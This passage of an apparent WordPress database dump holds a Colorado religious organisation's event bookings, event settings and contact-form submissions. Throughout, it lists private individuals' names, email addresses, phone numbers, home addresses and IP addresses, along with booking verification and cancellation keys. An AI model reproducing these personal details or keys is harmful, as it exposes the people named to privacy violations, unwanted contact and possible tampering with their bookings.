ECK,\nRhonda Miller\nBoulder, CO\n '),(182835,268457,'_form_id','6'),(182836,268457,'_seq_num','5'),(182837,268458,'_field_224','Jade'),(182838,268458,'_field_225','Beaty'),(182839,268458,'_field_226','jadebeaty2020@gmail.com'),(182840,268458,'_field_227','CO'),(182841,268458,'_field_228','US'),(182842,268458,'_field_229','a:1:{i:0;s:8:\"Loveland\";}'),(182843,268458,'_form_id','21'),(182844,268458,'_seq_num','171'),(182845,268459,'mec_transaction_id','SJA73724'),(182846,268459,'mec_user_id','1000078'),(182847,268459,'mec_verified','1'),(182848,268459,'mec_verification_key','df751442a1cc9b6ba88382fec0e98cfd'),(182849,268459,'mec_cancellation_key','6515fd98dd4ba664aa672536310014b2'),(182850,268459,'mec_confirmed','1'),(182851,268459,'mec_event_id','268430'),(182852,268459,'mec_date','1683455400:1683502200'),(182853,268459,'mec_ticket_id',',1,'),(182854,268459,'mec_booking_time','2023-05-07 10:20:03'),(182855,268459,'mec_all_dates','a:0:{}'),(182856,268459,'mec_other_dates','a:0:{}'),(182857,268459,'mec_attention_time','1683455400:1683502200'),(182858,268459,'mec_attention_time_start','1683455400'),(182859,268459,'mec_attention_time_end','1683502200'),(182860,268459,'mec_book_date_submit','20230507102003'),(182861,268459,'mec_booking_location','118'),(182862,268459,'mec_ticket_price_1','0'),(182863,268459,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:16:\"amhynes7@msn.com\";s:4:\"name\";s:13:\"Agnes R Hynes\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"71.205.145.147\";}}'),(182864,268459,'mec_price','0'),(182865,268459,'mec_gateway','MEC_gateway_free'),(182866,268459,'mec_gateway_label','Free'),(182870,268461,'mec_dont_show_map','0'),(182871,268461,'mec_organizer_id','1'),(182872,268461,'mec_read_more',''),(182873,268461,'mec_more_info',''),(182874,268461,'mec_more_info_title',''),(182875,268461,'mec_more_info_target','_self'),(182876,268461,'mec_cost',''),(182877,268461,'mec_currency','a:0:{}'),(182878,268461,'mec_additional_organizer_ids','a:0:{}'),(182879,268461,'mec_additional_location_ids','a:0:{}'),(182880,268461,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-05-20\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-05-20\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sat.3\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:1:\"4\";}}'),(182881,268461,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sat.3\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:1:\"4\";}'),(182882,268461,'mec_certain_weekdays','a:0:{}'),(182883,268461,'mec_allday','0'),(182884,268461,'one_occurrence','0'),(182885,268461,'mec_hide_time','0'),(182886,268461,'mec_hide_end_time','0'),(182887,268461,'mec_comment',''),(182888,268461,'mec_timezone','global'),(182889,268461,'mec_countdown_method','global'),(182890,268461,'mec_public','1'),(182891,268461,'mec_start_date','2023-05-20'),(182892,268461,'mec_start_time_hour','1'),(182893,268461,'mec_start_time_minutes','30'),(182894,268461,'mec_start_time_ampm','PM'),(182895,268461,'mec_start_day_seconds','48600'),(182896,268461,'mec_end_date','2023-05-20'),(182897,268461,'mec_end_time_hour','2'),(182898,268461,'mec_end_time_minutes','30'),(182899,268461,'mec_end_time_ampm','PM'),(182900,268461,'mec_end_day_seconds','52200'),(182901,268461,'mec_repeat_status','1'),(182902,268461,'mec_repeat_type','advanced'),(182903,268461,'mec_repeat_interval','1'),(182904,268461,'mec_repeat_end','never'),(182905,268461,'mec_repeat_end_at_occurrences','3'),(182906,268461,'mec_repeat_end_at_date',''),(182907,268461,'mec_advanced_days','a:1:{i:0;s:5:\"Sat.3\";}'),(182908,268461,'mec_in_days','2023-06-04:2023-06-04:10-30-AM:11-30-AM,2023-07-02:2023-07-02:10-30-AM:11-30-AM'),(182909,268461,'mec_not_in_days',''),(182910,268461,'mec_hourly_schedules','a:0:{}'),(182911,268461,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(182912,268461,'mec_tickets','a:0:{}'),(182913,268461,'mec_fees_global_inheritance','1'),(182914,268461,'mec_fees','a:0:{}'),(182915,268461,'mec_ticket_variations_global_inheritance','1'),(182916,268461,'mec_ticket_variations','a:0:{}'),(182917,268461,'mec_reg_fields_global_inheritance','1'),(182918,268461,'mec_reg_fields','a:0:{}'),(182919,268461,'mec_bfixed_fields','a:0:{}'),(182920,268461,'mec_op','a:0:{}'),(182921,268461,'mec_fields','a:0:{}'),(182922,268461,'mec_event_status','EventScheduled'),(182923,268461,'mec_moved_online_link',''),(182924,268461,'mec_cancelled_reason',''),(182925,268461,'mec_display_cancellation_reason_in_single_page',''),(182926,268461,'boldgrid_hide_page_title','0'),(182927,268461,'mec_notifications','a:4:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:16:\"certificate_send\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Event Attendee Certificates\";s:7:\"content\";s:252:\"<p>Hi %%name%%,</p>\r\n<p>Congratulations for successfully attending / completing the event %%event_title%%.<br />\r\nClick the following link to download or print your PDF certificate.</p>\r\n<p>%%certificate_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(182928,268461,'passster_activate_global_protection',NULL),(182929,268461,'passster_activate_protection',NULL),(182930,268461,'passster_protection_type','password'),(182931,268461,'boldgrid_in_page_containers','1'),(182932,268461,'passster_area_shortcode',''),(182935,268461,'_dp_original','268406'),(182934,268461,'_thumbnail_id','268462'),(182936,268461,'_edit_lock','1698550150:2'),(182937,268461,'_edit_last','2'),(182938,268462,'_wp_attached_file','2023/05/villas-1.jpg'),(182939,268462,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:764;s:6:\"height\";i:430;s:4:\"file\";s:20:\"2023/05/villas-1.jpg\";s:8:\"filesize\";i:56977;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"villas-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10962;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"villas-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5445;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:20:\"villas-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14695;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:20:\"villas-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25652;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:20:\"villas-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19119;}s:8:\"tileview\";a:5:{s:4:\"file\";s:20:\"villas-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16121;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(182940,268463,'mec_transaction_id','OTP13966'),(182941,268463,'mec_user_id','1000081'),(182942,268463,'mec_verified','1'),(182943,268463,'mec_verification_key','8cc36470c37158bfd0cd8dfeebb1c5ba'),(182944,268463,'mec_cancellation_key','535eb20af56f7f7f010d660b7c60ce06'),(182945,268463,'mec_confirmed','1'),(182946,268463,'mec_event_id','268417'),(182947,268463,'mec_date','1684060200:1684063800'),(182948,268463,'mec_ticket_id',',1,'),(182949,268463,'mec_booking_time','2023-05-09 08:15:07'),(182950,268463,'mec_all_dates','a:0:{}'),(182951,268463,'mec_other_dates','a:0:{}'),(182952,268463,'mec_attention_time','1684060200:1684063800'),(182953,268463,'mec_attention_time_start','1684060200'),(182954,268463,'mec_attention_time_end','1684063800'),(182955,268463,'mec_book_date_submit','20230509081507'),(182956,268463,'mec_booking_location','129'),(182957,268463,'mec_ticket_price_1','0'),(182958,268463,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"eileenjoy12@gmail.com\";s:4:\"name\";s:10:\"Eileen Joy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"72.212.112.205\";}}'),(182959,268463,'mec_price','0'),(182960,268463,'mec_gateway','MEC_gateway_free'),(182961,268463,'mec_gateway_label','Free'),(182962,268464,'_field_1','42'),(182963,268464,'_field_2',''),(182964,268464,'_form_id','1'),(182965,268464,'_seq_num','2'),(182970,268465,'mec_cancellation_key','7acb2d9f1758db79a67a63f82adfd40e'),(182971,268465,'mec_confirmed','1'),(182972,268465,'mec_event_id','268417'),(182973,268465,'mec_date','1684060200:1684063800'),(182974,268465,'mec_ticket_id',',1,'),(182975,268465,'mec_booking_time','2023-05-13 14:58:04'),(182976,268465,'mec_all_dates','a:0:{}'),(182977,268465,'mec_other_dates','a:0:{}'),(182978,268465,'mec_attention_time','1684060200:1684063800'),(182979,268465,'mec_attention_time_start','1684060200'),(182980,268465,'mec_attention_time_end','1684063800'),(182981,268465,'mec_book_date_submit','20230513145804'),(182982,268465,'mec_booking_location','129'),(182983,268465,'mec_ticket_price_1','0'),(182984,268465,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"eileenjoy12@gmail.com\";s:4:\"name\";s:10:\"Eileen Joy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"72.212.112.205\";}}'),(182985,268465,'mec_price','0'),(182986,268465,'mec_gateway','MEC_gateway_free'),(182987,268465,'mec_gateway_label','Free'),(182988,268466,'_field_496','Bonnie'),(182989,268466,'_field_497','Alexander-Reeves'),(182990,268466,'_field_498','(719) 694-1880'),(182991,268466,'_field_499','cosprings.director@eckankar-colorado.org'),(182992,268466,'_field_500','8963 Backgammon Dr'),(182993,268466,'_field_501','Colorado Springs'),(182994,268466,'_field_502','CO'),(182995,268466,'_field_503','US'),(182996,268466,'_field_505',''),(182997,268466,'_form_id','53'),(182998,268466,'_seq_num','11'),(182999,268467,'mec_transaction_id','DKV30060'),(183000,268467,'mec_user_id','1000023'),(183001,268467,'mec_verified','1'),(183002,268467,'mec_verification_key','008dfb9de2626c5e2cc6f285b340afdb'),(183003,268467,'mec_cancellation_key','80d6629999fbf9348362b7c501dec20a'),(183004,268467,'mec_confirmed','1'),(183005,268467,'mec_event_id','268417'),(183006,268467,'mec_date','1684060200:1684063800'),(183007,268467,'mec_ticket_id',',1,'),(183008,268467,'mec_booking_time','2023-05-13 19:41:11'),(183009,268467,'mec_all_dates','a:0:{}'),(183010,268467,'mec_other_dates','a:0:{}'),(183011,268467,'mec_attention_time','1684060200:1684063800'),(183012,268467,'mec_attention_time_start','1684060200'),(183013,268467,'mec_attention_time_end','1684063800'),(183014,268467,'mec_book_date_submit','20230513194111'),(183015,268467,'mec_booking_location','129'),(183016,268467,'mec_ticket_price_1','0'),(183017,268467,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:18:\"Bonnie Greenstreet\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"72.133.52.254\";}}'),(183018,268467,'mec_price','0'),(183019,268467,'mec_gateway','MEC_gateway_free'),(183020,268467,'mec_gateway_label','Free'),(183021,268468,'mec_transaction_id','PYX90518'),(183022,268468,'mec_user_id','1000081'),(183023,268468,'mec_verified','1'),(183024,268468,'mec_verification_key','e7795cb0df5a68a60c11789a4c573025'),(183025,268468,'mec_cancellation_key','08d9dc4129071d421a3925f35f28f22e'),(183026,268468,'mec_confirmed','1'),(183027,268468,'mec_event_id','268417'),(183028,268468,'mec_date','1684060200:1684063800'),(183029,268468,'mec_ticket_id',',1,'),(183030,268468,'mec_booking_time','2023-05-14 06:55:27'),(183031,268468,'mec_all_dates','a:0:{}'),(183032,268468,'mec_other_dates','a:0:{}'),(183033,268468,'mec_attention_time','1684060200:1684063800'),(183034,268468,'mec_attention_time_start','1684060200'),(183035,268468,'mec_attention_time_end','1684063800'),(183036,268468,'mec_book_date_submit','20230514065527'),(183037,268468,'mec_booking_location','129'),(183038,268468,'mec_ticket_price_1','0'),(183039,268468,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"eileenjoy12@gmail.com\";s:4:\"name\";s:10:\"Eileen Joy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"72.212.112.205\";}}'),(183040,268468,'mec_price','0'),(183041,268468,'mec_gateway','MEC_gateway_free'),(183042,268468,'mec_gateway_label','Free'),(183043,268469,'mec_transaction_id','UFH29900'),(183044,268469,'mec_user_id','1000081'),(183045,268469,'mec_verified','1'),(183046,268469,'mec_verification_key','6a2d517b0f778e4bd32b83705c58a6d4'),(183047,268469,'mec_cancellation_key','64229602b96df736b3050ad6b6866d9b'),(183048,268469,'mec_confirmed','1'),(183049,268469,'mec_event_id','268417'),(183050,268469,'mec_date','1684060200:1684063800'),(183051,268469,'mec_ticket_id',',1,'),(183052,268469,'mec_booking_time','2023-05-14 07:22:07'),(183053,268469,'mec_all_dates','a:0:{}'),(183054,268469,'mec_other_dates','a:0:{}'),(183055,268469,'mec_attention_time','1684060200:1684063800'),(183056,268469,'mec_attention_time_start','1684060200'),(183057,268469,'mec_attention_time_end','1684063800'),(183058,268469,'mec_book_date_submit','20230514072207'),(183059,268469,'mec_booking_location','129'),(183060,268469,'mec_ticket_price_1','0'),(183061,268469,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"eileenjoy12@gmail.com\";s:4:\"name\";s:10:\"Eileen Joy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"72.212.112.205\";}}'),(183062,268469,'mec_price','0'),(183063,268469,'mec_gateway','MEC_gateway_free'),(183064,268469,'mec_gateway_label','Free'),(183065,268470,'mec_transaction_id','GPM41789'),(183066,268470,'mec_user_id','1000014'),(183067,268470,'mec_verified','1'),(183068,268470,'mec_verification_key','fbef017fea19956d67445e7b4cb441d7'),(183069,268470,'mec_cancellation_key','67368773fdff45b59bccb0770d33b263'),(183070,268470,'mec_confirmed','1'),(183071,268470,'mec_event_id','268417'),(183072,268470,'mec_date','1684060200:1684063800'),(183073,268470,'mec_ticket_id',',1,'),(183074,268470,'mec_booking_time','2023-05-14 10:07:01'),(183075,268470,'mec_all_dates','a:0:{}'),(183076,268470,'mec_other_dates','a:0:{}'),(183077,268470,'mec_attention_time','1684060200:1684063800'),(183078,268470,'mec_attention_time_start','1684060200'),(183079,268470,'mec_attention_time_end','1684063800'),(183080,268470,'mec_book_date_submit','20230514100701'),(183081,268470,'mec_booking_location','129'),(183082,268470,'mec_ticket_price_1','0'),(183083,268470,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:11:\"Kery Colvin\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"174.51.176.48\";}}'),(183084,268470,'mec_price','0'),(183085,268470,'mec_gateway','MEC_gateway_free'),(183086,268470,'mec_gateway_label','Free'),(183087,268471,'mec_transaction_id','EPX33602'),(183088,268471,'mec_user_id','1000047'),(183089,268471,'mec_verified','1'),(183090,268471,'mec_verification_key','c087584aa8b7cc42e79fb0b417f9ed5f'),(183091,268471,'mec_cancellation_key','a343c92fc897e4c7652ca0be8a885786'),(183092,268471,'mec_confirmed','1'),(183093,268471,'mec_event_id','268417'),(183094,268471,'mec_date','1684060200:1684063800'),(183095,268471,'mec_ticket_id',',1,'),(183096,268471,'mec_booking_time','2023-05-14 10:16:27'),(183097,268471,'mec_all_dates','a:0:{}'),(183098,268471,'mec_other_dates','a:0:{}'),(183099,268471,'mec_attention_time','1684060200:1684063800'),(183100,268471,'mec_attention_time_start','1684060200'),(183101,268471,'mec_attention_time_end','1684063800'),(183102,268471,'mec_book_date_submit','20230514101627'),(183103,268471,'mec_booking_location','129'),(183104,268471,'mec_ticket_price_1','0'),(183105,268471,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:18:\"beth1848@yahoo.com\";s:4:\"name\";s:15:\"Beth massengale\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"172.56.96.104\";}}'),(183106,268471,'mec_price','0'),(183107,268471,'mec_gateway','MEC_gateway_free'),(183108,268471,'mec_gateway_label','Free'),(183109,268472,'mec_transaction_id','JXG14538'),(183110,268472,'mec_user_id','1000023'),(183111,268472,'mec_verified','1'),(183112,268472,'mec_verification_key','8c654c3df3ce70673e51e0d771e8b7ee'),(183113,268472,'mec_cancellation_key','172f22d4fbe95ec6139e955a77aa5feb'),(183114,268472,'mec_confirmed','1'),(183115,268472,'mec_event_id','268417'),(183116,268472,'mec_date','1684060200:1684063800'),(183117,268472,'mec_ticket_id',',1,'),(183118,268472,'mec_booking_time','2023-05-14 10:28:03'),(183119,268472,'mec_all_dates','a:0:{}'),(183120,268472,'mec_other_dates','a:0:{}'),(183121,268472,'mec_attention_time','1684060200:1684063800'),(183122,268472,'mec_attention_time_start','1684060200'),(183123,268472,'mec_attention_time_end','1684063800'),(183124,268472,'mec_book_date_submit','20230514102803'),(183125,268472,'mec_booking_location','129'),(183126,268472,'mec_ticket_price_1','0'),(183127,268472,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:18:\"Bonnie Greenstreet\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"72.133.52.254\";}}'),(183128,268472,'mec_price','0'),(183129,268472,'mec_gateway','MEC_gateway_free'),(183130,268472,'mec_gateway_label','Free'),(183131,268473,'_field_133','Sean'),(183132,268473,'_field_134','Swanson'),(183133,268473,'_field_135','sswanson@westmetrofire.org'),(183134,268473,'_field_137','Annual Fire Inspection'),(183135,268473,'_field_138','Hello, I\'m a lieutenant with West Metro Fire Department in Lakewood.  We are responsible for fulfilling the annual fire inspection on the Temple here in town.  I\'d like to arrange a time to meet for a brief 15-minute walkthrough and gather emergency contact information for the building. \n\nPlease reach out to me so we can make arrangements. \n\nThank you!'),(183136,268473,'_form_id','13'),(183137,268473,'_seq_num','133'),(183138,268474,'_field_224','Behrouz'),(183139,268474,'_field_225','Sohrabi'),(183140,268474,'_field_226','sohrabi.beh@gmail.com'),(183141,268474,'_field_227','CO'),(183142,268474,'_field_228','US'),(183143,268474,'_field_229','a:3:{i:0;s:16:\"Colorado Springs\";i:1;s:39:\"Central Colorado/ECK Temple in Colorado\";i:2;s:8:\"Loveland\";}'),(183144,268474,'_form_id','21'),(183145,268474,'_seq_num','172'),(183146,268475,'_field_496','Behrouz'),(183147,268475,'_field_497','Sohrabi'),(183148,268475,'_field_498','(720) 850-1775'),(183149,268475,'_field_499','sohrabi.beh@gmail.com'),(183150,268475,'_field_500','2580 S University Blvd Apt 303'),(183151,268475,'_field_501','Denver'),(183152,268475,'_field_502','CO'),(183153,268475,'_field_503','US'),(183154,268475,'_field_505',''),(183155,268475,'_form_id','53'),(183156,268475,'_seq_num','12'),(183157,268477,'protect_children',''),(183158,268477,'mec_color',''),(183159,268477,'mec_location_id','131'),(183160,268477,'mec_dont_show_map','0'),(183161,268477,'mec_organizer_id','1'),(183162,268477,'mec_read_more',''),(183163,268477,'mec_more_info',''),(183164,268477,'mec_more_info_title',''),(183165,268477,'mec_more_info_target','_self'),(183166,268477,'mec_cost',''),(183167,268477,'mec_currency','a:0:{}'),(183168,268477,'mec_additional_organizer_ids','a:0:{}'),(183169,268477,'mec_additional_location_ids','a:0:{}'),(183170,268477,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-06-11\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-06-11\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(183171,268477,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(183172,268477,'mec_certain_weekdays','a:0:{}'),(183173,268477,'mec_allday','0'),(183174,268477,'one_occurrence','0'),(183175,268477,'mec_hide_time','0'),(183176,268477,'mec_hide_end_time','0'),(183177,268477,'mec_comment',''),(183178,268477,'mec_timezone','global'),(183179,268477,'mec_countdown_method','global'),(183180,268477,'mec_public','1'),(183181,268477,'mec_start_date','2023-06-11'),(183182,268477,'mec_start_time_hour','1'),(183183,268477,'mec_start_time_minutes','0'),(183184,268477,'mec_start_time_ampm','PM'),(183185,268477,'mec_start_day_seconds','46800'),(183186,268477,'mec_end_date','2023-06-11'),(183187,268477,'mec_end_time_hour','2'),(183188,268477,'mec_end_time_minutes','30'),(183189,268477,'mec_end_time_ampm','PM'),(183190,268477,'mec_end_day_seconds','52200'),(183191,268477,'mec_repeat_status','0'),(183192,268477,'mec_repeat_type',''),(183193,268477,'mec_repeat_interval','1'),(183194,268477,'mec_repeat_end',''),(183195,268477,'mec_repeat_end_at_occurrences',''),(183196,268477,'mec_repeat_end_at_date',''),(183197,268477,'mec_advanced_days','a:0:{}'),(183198,268477,'mec_in_days',''),(183199,268477,'mec_not_in_days',''),(183200,268477,'mec_hourly_schedules','a:0:{}'),(183201,268477,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(183202,268477,'mec_tickets','a:0:{}'),(183203,268477,'mec_fees_global_inheritance','1'),(183204,268477,'mec_fees','a:0:{}'),(183205,268477,'mec_ticket_variations_global_inheritance','1'),(183206,268477,'mec_ticket_variations','a:0:{}'),(183207,268477,'mec_reg_fields_global_inheritance','1'),(183208,268477,'mec_reg_fields','a:0:{}'),(183209,268477,'mec_bfixed_fields','a:0:{}'),(183210,268477,'mec_op','a:0:{}'),(183211,268477,'mec_fields','a:0:{}'),(183212,268477,'mec_event_status','EventScheduled'),(183213,268477,'mec_moved_online_link',''),(183214,268477,'mec_cancelled_reason',''),(183215,268477,'mec_display_cancellation_reason_in_single_page',''),(183216,268477,'boldgrid_hide_page_title','0'),(183217,268477,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(183218,268477,'passster_activate_global_protection',NULL),(183219,268477,'passster_activate_protection',NULL),(183220,268477,'passster_protection_type','password'),(183224,268477,'_dp_original','266104'),(183222,268477,'boldgrid_in_page_containers','1'),(183223,268477,'passster_area_shortcode',''),(183225,268477,'_edit_lock','1684502571:15'),(183226,268477,'_edit_last','15'),(183227,268477,'_thumbnail_id','267212'),(183228,268479,'protect_children',''),(183229,268479,'mec_color',''),(183230,268479,'mec_location_id','161'),(183231,268479,'mec_dont_show_map','0'),(183232,268479,'mec_organizer_id','1'),(183233,268479,'mec_read_more',''),(183234,268479,'mec_more_info',''),(183235,268479,'mec_more_info_title',''),(183236,268479,'mec_more_info_target','_self'),(183237,268479,'mec_cost',''),(183238,268479,'mec_currency','a:0:{}'),(183239,268479,'mec_additional_organizer_ids','a:0:{}'),(183240,268479,'mec_additional_location_ids','a:0:{}'),(183241,268479,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-06-25\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-06-25\";s:4:\"hour\";s:1:\"5\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(183242,268479,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8: